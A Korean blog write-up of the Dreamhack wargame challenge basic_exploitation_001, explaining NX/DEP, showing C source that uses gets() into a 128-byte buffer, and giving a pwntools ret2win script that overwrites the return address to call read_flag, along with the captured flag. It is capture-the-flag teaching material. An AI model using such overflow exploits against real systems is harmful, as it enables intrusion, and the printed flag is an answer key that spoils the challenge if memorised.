basic_exploitation

🌇│System_Study/📕│Dreamhack_Hacking

basic_exploitation_001

Jastes 2022. 4. 27. 14:55

basic_exploitation_001

문제 풀이

자 들어가기 전에 문제가 발생했습니다..

바로 NX가 적용된 코드라는 것이죠
참고로 32-little endian linux이고요 그럼 들어가기 앞써서 NX에 대해 알아봐야겠죠?

NX(Bit | MS : DEP)

NX-Bit(Never eXecute Bit; 실행 방지 비트)
- 프로세스 명령어나 코드 또는 데이터 저장을 위한 메모리 영역 분리 CPU의 기술
- NX 특성으로 지정된 모든 메모리 구역은 데이터 저장을 위해서만 사용됨
- 프로세스 명령어가 그곳에 상주하지 않게 실행시켜줌

DEP(Data Execution Prevention)

- MS windows OS에 포함된 보안 기능이며, 악의적 코드 실행 방지를 위한 메모리 확인 기술
- DEP는 두 가지 모드로 실행됨
+ HW DEP : 메모리 명시적 실행 코드 포함 경우 제외하고 모든 프로세스 메모리 위치 실행X
= 대부분 최신 프로세서는 HW 적용 DEP를 지원
+ SW DEP : CPU가 HW DEP를 지원하지 않을 경우 사용

이렇게 볼 수 있습니다.
~~더 자세히는 나중에... 기재하겠습니다 댓글로 독촉해주세요~~

그럼 간단하게 알았으므로 즉 쉘코드가 실행이 되는 부분을 찾아야한다는 이야기!
그럼 코드를 확인하면서 봐볼까요?

//file name : basic_exploitation_001.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
 
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
 
 
void read_flag() { //NX - Bit 우회 가능 
    system("cat /flag");
}
 
int main(int argc, char *argv[]) {
 
    char buf[0x80]; //128 byte
 
    initialize();
    
    gets(buf); //vuln code
 
    return 0;
}

위 gets가 취약 코드죠 그 이유가 궁금한다면..

Exploit Tech: Return Address Overwrite

서론 이제 스택 오버 플로우를 활용한 RET를 변조해 셸을 획득하는.. 그런 워게임을 해봅시다 아래는 예제예요 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 // Name: rao.c // Compile:..

dystopia050119.tistory.com

NX 보호기법이 있기에 저런 함수를 이용해야하므로 주소를 알아내어
RET를 위 함수의 주소로 수정하면 flag를 얻을 수 있겠네요 ㅎ

info funtions를 이용하거나 아님 print해서 주소를 확인할 수 있죠

뭐 딱히 분석할 코드도 아니고 이전에 친절하게 자세히 했으므로 잘 모르겠다면..

Exploit Tech: Return Address Overwrite

dystopia050119.tistory.com

Mitigation: NX & ASLR

시스템 보안은 지난 수년간 발전해온 공격 기법과 보호 기법의 발전 양상을 보시면.. 어떤 보호 기법이 등장하면 우회 기술도 등장합니다.. 이렇게 어떤 공격이 올지 모르기에 시스템 개발자들

dystopia050119.tistory.com

어짜피 뭐 BOF 종류니까요 음.. 면밀하게 보면 저 링크랑 관련이 없을 수 있지만..

그럼 pwntools를 사용해 코드를 작성해볼까요?

#file : exploit.py
from pwn import *
context.log_level='debug'
 
#p = process('basic_exploitation_001')
p = remote('host1.dreamhack.games', '9014')
e = ELF('basic_exploitation_001')
read_addr = 0x80485b9
 
shellcode = b'A'*128
shellcode += b'B'*0x4
shellcode += p32(read_addr)
 
p.sendline(shellcode)
p.interactive()

뭐 이제는 분석할 필요없죠?

그럼 익스플로잇을 진행하면..

DH{01ec06f5e1466e44f86a79444a7cd116}

참고 자료

basic_exploitation_001

Description 이 문제는 서버에서 작동하고 있는 서비스(basicexploitation001)의 바이너리와 소스 코드가 주어집니다. 프로그램의 취약점을 찾고 익스플로잇해 "flag" 파일을 읽으세요. "flag" 파일의 내용을

dreamhack.io

01.NX Bit(MS : DEP) - TechNote - Lazenca.0x0

“html” 매크로 렌더링 오류 Notify your Confluence administrator that "Bob Swift Atlassian Apps - HTML" requires a valid license. Reason: VERSION_MISMATCH Excuse the ads! We need some help to keep our site up. “html” 매크로 렌더링 오

lazenca.net

참고 이미지

basic_exploitation_001

dreamhack.io

저작자표시 비영리 변경금지